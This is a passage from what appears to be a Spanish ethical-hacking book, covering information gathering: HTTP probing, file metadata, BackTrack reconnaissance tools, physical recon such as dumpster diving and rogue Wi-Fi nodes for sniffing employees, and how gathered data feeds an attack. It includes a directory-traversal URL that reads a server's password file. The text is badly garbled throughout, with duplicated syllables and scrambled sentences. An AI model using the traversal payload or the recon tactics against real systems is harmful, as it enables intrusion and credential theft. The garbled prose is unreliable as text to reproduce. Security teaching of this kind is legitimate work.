.com). Para Para anali analizar zar servi servicios cios dispo disponi nibles bles en puertos puer tos no habi habitua tuales les (por ejemplo ejemplo SSH en el puerto puerto 1255 ), AMAP de THC, cuyo cu yo sitio sitio de descar des carga ga es: http://free http://freeworld.th world.thc.org/thc-amap/. c.org/thc-amap/.

73

 

diferen dife rente. te. Debe Debemos mos tener tener pacien paciencia cia y utili utilizar zar la imagi imagina nación, ción, el senti sentido do común, común, ser intui in tuiti ti vos  vos o in inno no va  vado dores res y culti culti varnos.  varnos.

Peti Pe ticio ciones nes HTTP vital reco recono nocer cer En el chequeo chequeo de segu seguri ridad dad o bien en la emula emulación ción del ataque, ataque, es vital descubrir brir cosas cosas ocultas ocultas en el obobla im por  portan tancia cia que tiene tiene el gene generar rar errores errores y descu jeti je ti vo.  vo. Mu Muchas chas de éstas éstas pueden pueden lograr lograrse se a tra vés del puer puerto to 80, que es el ser vi  vidor dor  web don donde de se aloja aloja común comúnmen mente te el sitio sitio de la orga organi niza zación ción o un sitio sitio que está está en ese mismo mismo ser vidor,  vidor, en el que se encuen encuentra tra parte parte de la infor informa mación ción que busca buscamos. mos.

Mediante Median te una peti petición ción http (usando (usando el browser browser Inter Internet net Explo Explorer rer o una línea lí nea de coman co mandos, dos, por ejemplo), ejemplo), se puede puede encon encontrar trar infor informa mación ción muy impor importan tante te del obje ob jeti ti vo  vo y lle var a ca cabo bo algu algunos nos ataques ataques o chequeos chequeos muy inte intere resan santes. tes. Aunque Aunque muchos mu chos de ellos los iremos iremos viendo viendo en deta detalle lle a lo largo largo del libro, libro, aquí mencio mencio-namos na mos algu algunos nos ejemplos ejemplos simples: simples: • Descu cubrir brir si el obje objeti ti vo  vo es vul vulne nera rable ble a SQL injec injection tion colo colocan cando do una comi comilla lla simsimple en el formu formula lario rio de login login o string del URL. • Buscar direc directo torios rios (paths/car (paths/carpe petas tas/fol /folders) ders) ocultos. ocultos. • Subdo domi minios nios ocultos, ocultos, intra intranets, nets, extra extranets. nets. • CGIs co cono noci cidos dos o no, XSS. • Pa Path thss con con / al al final final (no es lo mismo mismo sitio sitio.com .com/path /path que sitio sitio.com .com/path/). /path/). • Pane neles les de admi adminis nistra tración ción web, ftp, de correo correo u otra aplica aplicación ción insti institu tucio cional nal o pripri vada  va da de desa desarro rrollo llo inter interno. no. • Aplica cacio ciones nes para para subir subir (upload) archi archi vos.  vos. • Repo posi sito torios rios de archi archi vos  vos confi con fiden dencia ciales les o no, ocultos ocultos o no. • Archi vos  vos típi típicos cos como como robots.txt, robots.txt, que listan listan paths públi públicos cos y ocultos ocultos en el ser vi vidor. • Códi digo go fuente fuente de la pági página. na. • Se pu pueden inyec inyectar tar scripts remo remotos. tos.

Herramien He rramient ta útil

CURL (ht CURL (http tp://curl ://curl.haxx .haxx.se) .se) es una línea línea de coman comando do para para transfe transferir rir archi archivos vos con una sinta sinta-xis URL, sopor soportan tando do FTP, FTPS, HTTP, HTTPS, SFTP, TFTP, LDAP, LDAPS . Curl so por porta ta certi cer tifi fica cados dos SSL, HTTP POST, HTTP PUT, FTP uploading, uploading, HTTP form based based upload, proxies, proxies, cookies, coo kies, auten autenti tifi fica cación ción user+pass user+password, word, file file transfer transfer resu resume, me, proxy tunne tunneling ling y otros.

74

 

• • • • •

Se pu pueden inyec inyectar tar coman comandos. dos. Se pu pueden inyec inyectar tar cookies. cookies. Se pu puede hacer hacer un file file retrie retrie ve, o extraer ex traer/leer /leer archi archi vos  vos del sis siste tema ma opera operati ti vo.  vo. Se pu pueden traspa traspasar sar direc directo torios. rios. Saltar contro controles les de ingre ingreso so de datos datos con un proxy.

• • • •

Se pu puede reempla reemplazar zar pará paráme metros tros del URL para para gene generar rar más errores. errores. Bajar archi archi vos  vos bina binarios rios o de otro tipo tipo para para anali analizar. zar. Se pu pueden encon encontrar trar gesto gestores res de archi archi vos.  vos. Otro Ot ros, s, co como mo por ejemplo ejemplo probar probar meter meter datos datos vía POST dando dando clic en el botón botón de Aceptar Aceptar y luego luego dando dando Enter, Enter, viendo viendo si hay dife diferen rencia cia en la compro comproba bación, ción, o hacer ha cer retrie retrie ve de al algu guna na cla ve o in infor forma mación ción adicio adicional. nal.

 Tengamos  Tenga mos en cuenta cuenta que un sitio sitio web no tiene tiene gran impor importan tancia cia en princi principio pio cocomo obje objeti ti vo,  vo, a me menos nos que el intru intruso so sepa sepa lo que hace hace y que este este sitio sitio tenga tenga las cacaracte rac terís rísti ticas cas que vemos a continuación: • Que esté aloja alojado do en una red de la orga or gani niza zación ción o bien por allí pasen pa sen todos todos los e-mails de ésta ésta (que sea simul simultá tánea neamen mente te ser vidor  vidor web y de correo). correo). • Qu Quee en en ese ese se serr vidor  vidor las cuentas cuentas de siste sistema ma sean simi simila lares res a las de otro ser vidor  vidor más críti crítico co en otro punto punto de la red y aquí sea más fácil fá cil extraer extraer las cuentas cuentas u otra infor in forma mación ción para para utili utilizar zar en ese otro sector. sector. • Que si sir va  va de nexo ne xo para para intro introdu ducir cirse se a la red inter interna na desde desde el exte exterior rior (Inter (Internet). net). • Qu Quee sea sea út útil il co como mo punto punto de captu captura ra median mediante te sniffers sniffers de todo todo lo que sale sale desde desde la orga organi niza zación ción hacia hacia Inter Internet net o que sea depó depósi sito to momen momentá táneo neo de archi archi vos  vos ex ex-traídos traí dos desde desde la red inter interna na de la orga organi niza zación. ción. • Que tam ambién bién sea utili utiliza zado do como como ser vidor  vidor de spoofing spoofing/hi /hijac jacking king/man-in-the/man-in-themiddle midd le para para acce acceder der a recur recursos sos con deter determi mina nadas das reglas reglas de acce acceso so en la red inter inter-na, o para para burlar burlar meca mecanis nismos mos de identi identifi fica cación ción de intru intrusos sos si los hubie hubiera. ra. Si busca buscamos mos URLs al azar median mediante te Google, Google, además además del méto método do de en viar  viarlos los a una honey ho neypot, pot, Google Google podrá podrá direc directa tamen mente te mostrar mostrarnos nos un aviso aviso como como el siguien siguiente: te: Lo sentimos... senti mos... pero pero en estos estos momen momentos tos no pode podemos mos proce procesar sar su soli solici citud. tud. Un  virus  vi rus de orde ordena nador dor o soft ware  ware es pía nos está está mandan mandando do soli solici citu tudes des auto automá má-ticas ti cas y, al pare parecer, cer, su red o su equi po  po ha sido si do infec infecta tado. do.

 Tenemos  Tene mos que tratar tratar de enten entender der cómo cómo es el siste sistema ma opera operati ti vo,  vo, qué erro errores res pudo pudo haber haber come co meti tido do su admi adminis nistra trador dor o progra programa mador dor web y prestar prestar atención atención a sus aplica aplicacio ciones, nes, las que de ser posi posible, ble, sería sería buena buena idea probar probarlas las antes antes en nuestra nuestra propia propia máqui máquina. na. Una exce ex celen lente te costum costumbre bre prácti práctica ca es insta instalar larse se un ser vidor  vidor de prueba prueba en casa casa o en el traba traba-jo.

75

 

Datos tos en archi archivos vos bina binarios rios y otros Da Los sitios sitios de las orga organi niza zacio ciones nes suelen suelen tener tener en su web archi archi vos  vos (en for forma mato to pdf, doc, xls o exe) que contie contienen nen di versa  versa infor informa mación, ción, como como presen presenta tacio ciones, nes, brochu brochures, res, tratrabajos ba jos de las más di versas  versas índo índoles, les, o aplica aplicacio ciones. nes. El análi análisis sis de estos estos archi archi vos  vos puede puede brindar brin darnos nos algu algunas nas pistas pistas sobre sobre la orga organi niza zación ción o parte parte de ella. Por ejemplo, ejemplo, los auautores to res de esos docu documen mentos tos pueden pueden ser emplea empleados dos actua actuales les que tienen tienen una cuenta cuenta shell en el ser vidor  vidor u otra termi terminal nal de la red que ya hemos hemos mapea mapeado do e indi indi vidua  vidualiliza zado do en Inter In ternet. net.

Metadatos.

Propie Pro pieda dades des de un archi archivo vo de Word ba ja  jado do de un sitio, sitio, cuyo cuyo autor autor

es un compo componen nente te de la supues supuesta ta orga organi niza zación ción ob je  jeti tivo vo y, proba probable blemen mente, te, tenga tenga una cuenta cuenta llama llamada da jpere jperezz en al algún gún servi servidor, dor, termi terminal nal o aplica aplicación ción de la compa compañía. ñía.

El mismo mismo tipo tipo de análi análisis sis puede puede lle var  varse se a cabo cabo en archi archi vos  vos bina binarios rios del tipo tipo .exe ya que éstos, éstos, si están están mal dise diseña ñados dos o prote protegi gidos, dos, nos darán darán algún algún path, cuenta cuenta de usuausuario, o bien pistas pistas sobre sobre el autor autor o quién lo desa desarro rrollo llo y la plata platafor forma ma de su termi terminal. nal.

Herramien He rramient tas para extraer y analizar metadata

Algunas Algu nas herra herramien mientas tas para para llevar llevar a cabo cabo el análi análisis sis de los datos datos de los archi archivos vos puepueden ser encon encontra tradas das buscán buscándo dolas las ba jo el térmi término no meta metada data ta extrac extracto torr en Goo Google gle o bien en direc direccio ciones nes como www.edge-security.com/metagoofil.php, www.re www.remo mote-ex te-exploi ploi-t.org/co t.org /codes_wy des_wyd.html d.html y www www.da .data tares rescue cue.co .com/i m/ida daba base/in se/index.htm. dex.htm.

76

 

Information Gathering en la vida real. Si el intru indatos truso so de es muy per perse se  veran  ve rante te hadios, hace ce usoluga técnicas técni exsos exhaus hausti ti vas,  vas, tra rá deEsto ob obtener te ner da tos la orga organi niza zación ción enomedios, me lude gares res y cas recursos recur de la vida vitrata datará real. Es tosigni sig nifi fica ca que lo hará hará fuera fuera de Inter Internet net o bien utili utilizan zando do tecno tecnolo logía gía basa basada da en ésta, ésta, pero pe ro lle va  vada da al contex contexto to físi físico co y cerca cercano no del obje objeti ti vo.  vo. La más co común mún es: • Buscar datos datos de la orga organi niza zación ción o compo componen nentes tes de ella en perió periódi dicos, cos, re vis  vistas, tas, cacatálo tá logos gos e impre impresos sos de todo todo tipo. tipo. Consul Consultar tar en la biblio bibliote teca ca u otros centros centros de ininforma for mación ción archi archi vada  vada en papel papel o micro microfilm. film. • Llamar por telé teléfo fono. no. No nece necesa saria riamen mente te hacien haciendo do Inge Ingenie niería ría Social. Social. Se puede puede llallamar y pregun preguntar tar datos datos concre concretos, tos, direc directos. tos. • En viar co correo rreo ordi ordina nario rio postal postal con consul consultas tas o recur recursos sos para para obte obtener ner infor informa ma-ción median mediante te mal ware  ware u otra técni técnica. ca. • Visi sitar tar en perso persona na la orga organi niza zación. ción. • Re vi  visar sar la basu basura ra (trashing) (trashing) para para encon encontrar trar impre impresos sos descar descarta tados, dos, CD raya rayados dos (és(éstos se leen fácil fácilmen mente te con el soft ware  ware AnyRea AnyReader), der), buscar buscar impre impresio siones nes tritu tritura radas das en tiras tiras (son fácil fácilmen mente te recu recupe pera rables bles con algo algo de pacien paciencia cia y una pinza pinza del tipo tipo para pa ra depi depila lación), ción), anota anotacio ciones nes con pass words o co correos, rreos, membre membretes tes de la orga organi ni-zación, za ción, polí políti ticas cas y un sin fin de mate material rial dese desecha chado do que puede puede ofrecer ofrecer distin distinto to titipo de infor informa mación ción acerca acerca del obje objeti ti vo.  vo. • Insta talar lar uno o varios varios nodos nodos wire wireless less cerca cerca de la orga organi niza zación ción para para que sea utili utiliza za-do por los emplea empleados dos con note notebooks books y que así puedan puedan ser snifea snifeados, dos, como como tamtambién otras técni técnicas cas más direc directas tas y menos menos pasi pasi vas  vas co como mo el wardri wardri ving  ving (ac (acción ción de detec de tectar tar redes redes inalám inalámbri bricas cas inse insegu guras, ras, reco recorrien rriendo do la ciudad ciudad o el barrio barrio con las heherramien rra mientas tas adecua adecuadas), das), compro comprome metien tiendo do o anali analizan zando do recur recursos sos WiFi. WiFi.

 Análisis de cabeceras http Desde www.rexs www.rexswain wain.com/http .com/httpvi view ew.h .htm tmll po podre dremos mos anali analizar zar las cabe cabece cera rass htt http p de lo loss hosts remo remota tamen mente, te, entre entre otros datos. datos. En el docu documen mento to que se ofrece ofrece para para su lectu lectura ra en la dirección www.uo www.uoc.e c.edu du/mas /master ters/es s/esp/img/873.pdf, p/img/873.pdf, encon encontra trare remos mos mucha mucha infor informa mación ción acerca acer ca de las soli solicitu citudes des http y su entor entorno no en aplica aplicacio ciones, nes, desa desarro rrollo llo y moto motores. res.

77

 

Anyreader. Apli Aplica cación ción que puede puede extraer extraer infor informa mación ción de discos discos

daña da ñados dos (CD, DVD, disquet disquette, te, unidad unidad de red con transfe transferen rencia cia incon inconsis sisten tente). te). Muy útil a la hora hora de extraer extraer datos datos de unida unidades des descar descarta tadas das a la basu basura. ra.

• Otro ross mé méto todos: dos: suelen suelen ser utili utiliza zados dos por miembros miembros de orga organis nismos mos de segu seguri ridad dad u orga or gani niza zacio ciones nes infor informa males les con recur recursos sos de alta alta tecno tecnolo logía, gía, como como la inter intercep cepción ción de telé te léfo fonos nos de línea línea y celu celula lares, res, inter intercep cepción ción de radia radiación ción de moni monito tores res via ea ves  vesdrop drop-ping (esta (esta técni técnica ca es utili utiliza zada da para para ver, a la distan distancia, cia, aquello aquello que hay en un moni monitor tor a tra vés de de la radia radiación ción de este), este), escu escuchas chas a distan distancia, cia, infil infiltrar trar perso personal nal en la orga organi ni-zación za ción o bien rela relacio cionar narse se con emplea empleados dos de ésta ésta en otros ámbi ámbitos, tos, entre entre otras coco-

sas. La técni técnica ca Inge Ingenie niería ría Social Social es la más común común de utili utilizar zar en la vida vida real para para obte obtener ner datos da tos o compro comprome meter ter fácil fácilmen mente te recur recursos sos liga ligados dos al siste sistema. ma. Los deta detalles lles de esta esta

 Anécdota

Hace un tiempo, repor Hace reporté té una falla falla en un portal portal labo laboral ral en el que había había 46.000 currí currícu culum lum vítae ví tae listos listos para para ser ba ja  jados dos con un simple simple script. El error era de progra programa mación ción ya que, una vez loguea logueado do con un usuario usuario legí legíti timo, mo, si uno reempla reemplaza zaba ba el userID userID por otro userID userID (en la URL liga ligada da a la sección sección edición edición del CV, direc directa tamen mente te se pasa pasaba ba a editar editar el CV ajeno. ajeno.

78

 

téc técni nica ca los vere veremos mos en el próxi próximo mo capí capítu tulo. lo.

Utili Uti lida dades des IG de Backtrack Backtrack 2.0 Backtrack (www Backtrack (www.re .remo mote-ex te-exploi ploit.org t.org/back /backtrack.html) track.html) es una dis distri tribu bución ción LiLi veCD de Li Linux, nux, lo que sig signi nifi fica ca que no hace hace fal falta ta ins insta talar lar el sis siste tema ma ope opera rati ti  vo vo ya que pode podemos mos co correr rrerlo lo di direc recta tamen mente te des desde de su CD o in inclu cluso so desde desde un pendri pendri- ve. Es una dis distri tribu bución ción crea creada da en es espe pecial cial pa para ra quienes quienes están están rela relacio ciona nados dos con la segu seguri ridad dad infor informá máti tica. ca. De to todas das ma mane neras, ras, es re reco comen menda dable ble testear testear to todos dos los CD de booteo booteo orien orienta tados dos a se segu guri ridad. dad. Se re reco comien mienda da ba bajar jarlos los siempre siempre en sus úlúltimas ti maspode versio siones. nes. Vea Veamos mosenbre  ve  vemen mente te las uti utililida dades des de Infor Informa mation tion Gat Gathe hering  ring  que pover demos mos en encon contrar trar Back Backtrack. track.

IG.

Este Es te CD bootea booteable ble (de base base Linux), Linux), que también también es insta instala lable, ble,

posee po see herra herramien mientas tas muy útiles útiles a la hora hora de asestar asestar un chequeo chequeo de segu seguri ridad. dad.

GNU/LI  NUX GNU/LI Aunque la insta Aunque instala lación ción de los siste sistemas mas opera operati tivos vos GNU/Li GNU/Linux nux ya no es tan compli complica cada da como como solía so lía ser, si quere queremos mos obte obtener ner infor informa mación ción antes antes de llevar llevar a cabo cabo esta esta tarea tarea y cono conocer cer más deta de talles lles sobre sobre las distri distribu bucio ciones nes dispo disponi nibles, bles, pode podemos mos visi visitar tar sitios como www.de www.debia bian.or n.or-g/relea g/re leases/s ses/sta table/i386, ble/i386, www. www. distro distrowatch watch.co .com m o http http://ker ://kernel nelfun fun.blogs .blogspot pot.com. .com.

79

 

Mó Módu dulo lo Archi Archi ve  ve

Finger Google: Finger Google: es una utili utilidad dad para para buscar buscar usuarios usuarios de cuenta cuenta median mediante te Google. Google. Recur Re cursos sos onli online: ne: ww w.ar  w.archi chi ve.org   ve.org  Módu Mó dulo lo DNS

DNS -Ptr: reali realiza za Querys DNS masi masi vos  vos so sobre bre un rango rango de direc direccio ciones nes IP, transformán for mándo dolas las a direc direccio ciones nes web en caso caso de que las haya. ha ya. DNS-Walk: es un DNS debug debugger ger (http://sour (http://source cefor forge ge.net .net/pro /projects/dns jects/dns walk). DNSBru DNS Brute tefor force: ce: se usa para para reali realizar zar fuerza fuerza bruta bruta en una reso resolu lución ción de nombre nombre (www.rev (www .revhosts hosts.net/DNS .net/DNSBru Brute tefor force). ce). DNS DNSMap: Map: otra uti dad para paen ra Perl hacerque hacer fuer fuerza bru bruta ta en dobres domi minios. nios. DNSPre DNS Predict: dict: es utili unlidad script deza deter termi mina na nom nombres DNS a tra vés de Google. Google. Dig: aplica aplicación ción para para inte interro rrogar gar nombres nombres DNS (http://li (http://linux nux.die .die.net .net/man /man/1/dig). /1/dig). Dns Enum: herra herramien mienta ta escri escrita ta en Perl para para enume enumerar rar infor informa mación ción en un domi dominio nio (www.fi (www .filip lip.waey .waeyten tens.easy s.easynet net.be). .be). Host: herra herramien mienta ta simple simple para para reali realizar zar DNS lookups. lookups. Recur Re cursos sos onli online: ne: www.dnsre www.dnsreport port.com. .com. Módu Mó dulo lo Route Route

 Ass: pa para ra detec detectar tar routers; routers; sopor soporta ta varios varios proto protoco colos los (http://phe (http://phenoe noelit-us.or lit-us.org/ir g/ir-pas/docu.htm pas/do cu.html#ass). l#ass). Fire Fi re walk: deter determi mina na qué proto protoco colos los pasan pasan a tra vés de un fire fi re wall. Intra In trace: ce: espe especie cie de trace tracerou route. te. Itrace: Itra ce: reali realiza za trace tracerou route te con paque paquetes tes ICMP. Nete Ne tenum: num: produ produce ce listas listas de hosts para para otros progra programas. mas. Netmask: Net mask: consi consigue gue la netmask netmask (másca (máscara ra de red) a tra vés de paque pa quetes tes ICMP. Protos: Pro tos: es un escá escáner ner de proto protoco colos los IP.  Tctra  Tc trace: ce: tracea tracea (de tracear, tracear, trace tracerou route) te) con paque paquetes tes TCP SYN. Módu Mó dulo lo SMTP

DMitry: brinda brinda toda toda la infor informa mación ción posi posible ble sobre sobre un host. Goog Mail Enum: encuen encuentra tra e-mails de deter determi mina nados dos domi dominios nios median mediante te Google. Google.

Inf In for orm mac ació ión n Bac ack ktr tra ack

En www.li www.linux nuxha haxor xor.net .net/2007/07/22/back /2007/07/22/backtrack-2-all-in track-2-all-infor forma mation-gat tion-gathe hering-tools-re ring-tools-re-viewed, vie wed, pode podemos mos encon encontrar trar una exce excelen lente te revi revisión sión de Backtrack Backtrack en idioma idioma inglés inglés y con panta pan tallas. llas. Para Para cono conocer cer el deta detalle lle de todas todas las herra herramien mientas tas de este este CD, es posi posible ble vivisitar si tar la direc dirección ción http:// http:// backtrac backtrack.of k.offen fensi sive-se ve-secu curity rity.co .com/in m/index.php dex.php?ti ?title tle=Tools. =Tools.

80

 

Pi Pira rana: na: es una plata platafor forma ma para para testear testear el filtro filtro de conte conteni nido do de un ser vidor  vidor de cocorreo deter determi mina nado. do. Relay Re lay Scanner: Scanner: es para para compro comprobar bar relay relay abierto abierto en ser vido  vidores res SMTP. SMTP Vrfy: se utili utiliza za para para veri verifi ficar car la existen existencia cia de usuarios usuarios median mediante te fuerza fuerza brubruta en un ser vidor  vidor SMTP. Recur Re cursos sos onli online: ne: www.rbls.org, www.rbls.org, www.spam www.spamcop cop.net, .net, www.spam www.spamhau haus.org. s.org.

Dimitry. He Herra rramien mienta ta para para encon encontrar trar datos datos onli online ne

sobre so bre una deter determi mina nada da orga organi niza zación ción en Inter Internet. net.

Módulo Módu lo Searchen Searchengi gine ne DNSPre DNS Predict: dict: es un script en Perl que predi pre dice ce nombres nombres DNS a tra vés de Google. Goo gle. Finger Fin ger Google: Google: es una utili utilidad dad para para buscar buscar usuarios usuarios de cuenta cuenta median mediante te Google. Google. Goog Mail Enum: es una utili uti lidad dad que nos permite buscar buscar usuarios usuarios de cuenta cuenta memediante dian te Google Google y domi dominios. nios. Google-search: Goo gle-search: script para para buscar buscar en Google Google desde desde la línea línea de coman comandos. dos.

Googrape: Googra pe: sir ve  ve para pa ra buscar buscar en la Google Google Hacking Hacking DB. Gooscan: Goos can: se utili utiliza za para para en viar peti pe ticio ciones nes auto automa mati tiza zadas das a Google Google search applian applian-ces.

Perfil del oficial de seguridad informática Si quere queremos mos obte obtener ner más infor informa mación ción sobre sobre el perfil perfil que debe debe tener tener un oficial oficial de la seseguri gu ridad dad infor informá máti tica, ca, en http://rfc.cu http://rfc.cudi.e di.edu.mx du.mx/drafts /drafts/draft2.pdf, /draft2.pdf, pode podemos mos leer un dodocumen cu mento to más formal formal en el que se deta detallan llan algu algunas nas de las respon responsa sabi bili lida dades, des, habi habili lida da-des reque requeri ridas das y ob je  jeti tivos. vos.

81

 

QGoo QGoogle: gle: reali realiza za peti peticio ciones nes a Google Google desde desde python, python, requie requiere re una licen licencia cia váli válida. da. Recur Re cursos sos onli online: ne: ww w.allt  w.allthe he web  web.com, .com, www.dog www.dogpi pile le.com, .com, www.goo www.google gle.com, .com, wwwwww.google .goo gle.com .com/hel /help/o p/ope pera rators.html, tors.html, ww w.in  w.info foseek seek.com .com y www.kar www.kartoo too.com. .com. Módu Mó dulo lo Sur vey

Recur Re cursos sos onli online: ne: www.net www.netcraft craft.com. .com. Módu Mó dulo lo Whois

Recursos Recur sos onli online: ne: ww w.a  w.afri frinic nic.net, .net, ww w.a  w.ap pnic nic.net, .net, ww w.a  w.arin rin.net, .net, ww w.i  w.in nter ternic nic.net, .net,  www.lac  www .lacnic nic.net, .net, www.ni www.nic.ar, c.ar, www.ni www.nic.uk, c.uk, www.ri www.ripe pe.net .net y www.sams www.samspa pade.org. de.org.

Otros live Cds orientados a seguridad:  www.isafe.gr/talos.html  www.securitydistro.com  www.e-fense.com/helix  www.linux-forensics.com  www.knoppix-std.org

 Anali  Ana lizar zar la infor informa mación ción El hori horizon zonte te se abre como como un abani abanico co mientras mientras más infor informa mación ción se va reco recopi pilan lan-do acerca acerca de la orga organi niza zación ción obje objeti ti vo.  vo. Aun así, el ra raca caba bado do de infor informa mación ción sigue sigue mas allá de la etapa etapa inicial, inicial, exten extendién diéndo dose se a cada cada una de las etapas etapas poste posterio riores res del emba em bate. te. Cabe Cabe desta destacar car que no se deja deja de reco recopi pilar lar infor informa mación ción hasta hasta que el traba traba-jo se ha logra logrado do total total o parcial parcialmen mente. te. Muchas Muchas veces, veces, aún duran durante te el chequeo, chequeo, se sisigue obte obtenien niendo do infor informa mación ción sustan sustancial cial que puede puede llegar llegar a darnos darnos pistas pistas para para inten inten-tar otras cosas cosas dentro dentro del siste sistema, ma, quizás quizás hasta hasta replan replantear tearnos nos por qué sector sector de la infraes in fraestruc tructu tura ra centrar centrar nuestro nuestro esfuer esfuerzo zo o bien reorde reordenar nar comple completa tamen mente te nuestra nuestra plani pla nifi fica cación, ción, secuen secuencia cia e inten intentos, tos, a partir partir de allí.

SQL Structu tured red Query Langua Language  ge ) es un lengua SQL (Struc lengua je de progra programa mación ción que permi permite te acce acce-der a bases bases de datos datos rela relacio ciona nalles para alma almace cenar, nar, mani manipu pular lar y recu recupe perar rar los datos datos

que se encuen encuentran tran en ellas. Para Para obte obtener ner más infor informa mación ción sobre sobre las carac caracte terís rísti ticas cas de este es te lengua lengua je, pode podemos mos visi visitar, tar, por ejemplo, ejemplo, el sitio sitio http://sql.1key http://sql.1keyda data ta.co .com/es/. m/es/.

82

 

Un claro claro ejemplo ejemplo de esto esto es cuando cuando obte obtene nemos mos una shell en el ser vidor  vidor obje objeti ti vo  vo y, acto ac to segui seguido, do, vemos vemos el conte conteni nido do de los archi archi vos  vos .bash .bash _his  _history, tory, con todo todo el histo historial rial de los coman comandos dos que ejecu ejecutó tó el admi adminis nistra trador dor y algu algunos nos usuarios. usuarios. Quizá Quizá esa infor informa ma-ción cuente cuente hasta hasta con la cla ve root tipea tipeada da por error, o poda podamos mos ver el fiche fichero ro de confi con figu gura ración ción de red o las cone conexio xiones nes esta estable bleci cidas das con las redes redes y termi termina nales les inter inter-nas.

 Aho ra bien, ¿cómo  Ahora ¿cómo pode podemos mos anali analizar zar la infor informa mación ción obte obteni nida da pre via  viamen mente te al ataque? ata que? Eso es fácil: fá cil: una simple simple cuestión cuestión de análi análisis sis deta detalla llado. do. Pregun Preguntar tarse se para para qué nos sir ve ca cada da dato dato es el primer primer paso. paso. A continuación veremos algu algunos nos ejemplos ejem plos de la utili utilidad dad que tiene cono conocer cer ciertos ciertos datos. datos. El nombre nombre de un em plea  pleado do de la orga organi niza zación: ción: Pa Para ra dedu deducir cir el usuario usuario con cuenta cuen ta shell en el siste sistema ma opera operati ti vo,  vo, una cuen cuenta ta de correo correo (u otro ser vicio  vicio de auautenti ten tifi fica cación), ción), para para utili utilizar zar inge ingenie niería ría social social en cualquie cualquiera ra de sus ni veles  veles y formas, formas, para pa ra hacer hacer retrie retrie ve de algún algún dato, dato, ampliar ampliar el diccio dicciona nario rio al utili utilizar zar algu alguna na técni técnica ca de brute bru te force, force, para para descu descubrir brir algu alguna na carpe carpeta ta o docu documen mento to onli online, ne, dedu deducir cir algún algún passpass word, compro com prome meter terlo lo para para asegu asegurar rarse se acce acceso so con otra identi identidad dad en el siste sistema, ma, papara contas consul sultar tar otros(logins): am ambien bientes tes y tas bases bases deciden datos, datos, etel céte tera. ra. bre de las cuentas Cuentas Cuen de en emails (lo gins): Si éstas és coin coinci den conetcé nom nombre cuentas de sissistema, te ma, se podrán podrán utili utilizar zar para para conse conseguir guir acce accesos sos remo remotos tos a ser vido  vidores res o termi termina nales. les.  También  Tam bién pueden pueden ser útiles útiles a la hora hora de conse conseguir guir infor informa mación ción insti institu tucio cional nal mane maneja jada da por el usuario usuario vía e-mail o bien practi practicar car deter determi mina nado do chequeo chequeo de pass words por por dedefecto. fec to. La plata platafor forma: ma: Sir ve  ve pa para ra alinear alinear el chequeo chequeo a dicha dicha plata platafor forma ma y sus posi posibles bles descui des cuidos, dos, ser vi  vicios cios y vulne vulnera rabi bililida dades. des. Veamos Veamos un ejemplo ejemplo muy bási básico co del por qué sir ve co cono nocer cer bien la plata platafor forma ma o siste sistema ma opera operati ti vo.  vo. Su Supon ponga gamos mos que en uno de los sitios si tios de la orga organi niza zación ción (noso (nosotros tros no sabe sabemos mos que está está corrien corriendo do sosobre sisgrama siste tema ma opepuede opera rati tide  volistar  vo FreeBSD) Free quere remos un entema) PHP que está es tá mal el pro progra mado do pue lis tar BSD) el conte conque teni nido domos de ver su archi arsichi  voscript  vo (de sis siste ma) passwd*, ingre in gresan sando do este este URL en el browser: browser: http://www.si http://www .sitio tio vic  victi tima ma.com .com/fi /file.php le.php?=../../../../passwd%00 ?=../../../../passwd%00

 Agr egar  Agre garle le eso al file.php fi le.php está está mal, porque porque al ser un siste sis tema ma opera operati ti vo  vo Free FreeBSD, BSD, su fiche fichero ro passwd (típi (tí pico co de Linux) Li nux) se llama llama master master.passwd, .passwd, y es éste éste el query  (peti (pe tición ción http) correc correcto: to: http://www.si http://www .sitio tio vic  victi tima ma.com .com/fi /file.php le.php?=../../../../mas ?=../../../../master ter.passwd%00 .passwd%00 La canti cantidad dad de /../ varía varía según según el siste sistema ma (Direc (Directory tory trans ver  versal sal issue), issue), la aplica aplicación ción y  el progra programa mador, dor, al igual que el uso del carác carácter ter NULL del final final %00, que puede puede estar estar o no. 83

 

sitio tio web o subdo subdomi minio: nio: Pa Para ra anali analizar zarlo lo minuciosamente en primer primer lugar lugar ya Un si que éstos, éstos, median mediante te peti peticio ciones nes http o esca escaneo neo de vulne vulnera rabi bililida dades des y puertos, puertos, aporaportan muchos muchos datos datos impor importan tantes. tes.

tan muchos muchos datos datos impor importan tantes. tes. Backup Bac kup onli online: ne: Da Datos tos sensi sensibles bles o no. Claro Claro cono conoci cimien miento to de la existen existencia cia de desdescuidos cui dos del admi adminis nistra trador dor por parte parte del intru intruso. so. Busca Buscará rá todo todo aquello aquello que se inten inten-te asegu asegurar rar por oculta ocultamien miento. to.  Agentes  Agen tes exter externos nos (ni (nic.ar, c.ar, ISP, pro vee  veedo dores, res, clientes, clientes, etcé etcéte tera): ra): La inter intercep cepción ción de éstos és tos puede puede brindar brindar infor informa mación ción muy sensi sensible ble o bien, utili utiliza zable ble en el obje objeti ti vo.  vo. Una intra intrane net/ex t/extra tranet: net: Ex Extraer traer datos datos inter internos nos inte intere resan santes. tes. Una car pe  peta ta o archi archi vo  vo oculto: oculto: Pue Puede de brindar brindar datos. datos.  Telé  Te léfo fonos: nos: Pa Para ra hacer hacer inge ingenie niería ría social. social. Direc Di reccio ciones: nes: Pa Para ra hacer hacer inge ingenie niería ría social, social, reali realizar zar IG en perso persona na o en la cerca cercanía. nía. Pass words: Ge Gene nerar rar rela relati ti vos  vos co comu munes nes y probar probarlos los en todos todos los ser vicios  vicios de auautenti ten tifi fica cación. ción. Datos Da tos perso persona nales: les: Pro Probar barlos los como como pass words, usarlos usarlos como como inge ingenie niería ría social. social. Una sucur sucursal: sal: Bus Buscar car puntos puntos de inter intercep cepción ción en la infraes infraestruc tructu tura ra que va hacia hacia la casa ca sa matriz, matriz, inge ingenie niería ría social social onli online ne o in situ. situ. Un ser ver o no nodo do inter interme medio: dio: Bus Buscar car compro comprome meter terlo lo para para interceptar infor informa ma- po de de regla regla de fire fire wal  walll o IDS: IDS: Ma ción. Un ti po Mane nejar jarse se con los proto protoco colos los debi debidos dos papara aludir aludirlo lo o dejar dejarlo lo sin efecto efecto median mediante te la incor incorpo pora ración ción o modi modifi fica cación ción de las reglas reglas actua ac tuales. les. Proto Pro toco colos: los: Ali  Alinear near técni técnicas, cas, planea planeamien miento to y herra herramien mientas tas al obje objeti ti vo.  vo.  Arqui  Ar quitec tectu turas: ras: Ali  Alinear near técni técnicas, cas, planea planeamien miento to y herra herramien mientas tas al obje objeti ti vo.  vo. Puertos Puer tos abiertos: abiertos: Ex Extraer traer infor informa mación ción como como versión, versión, 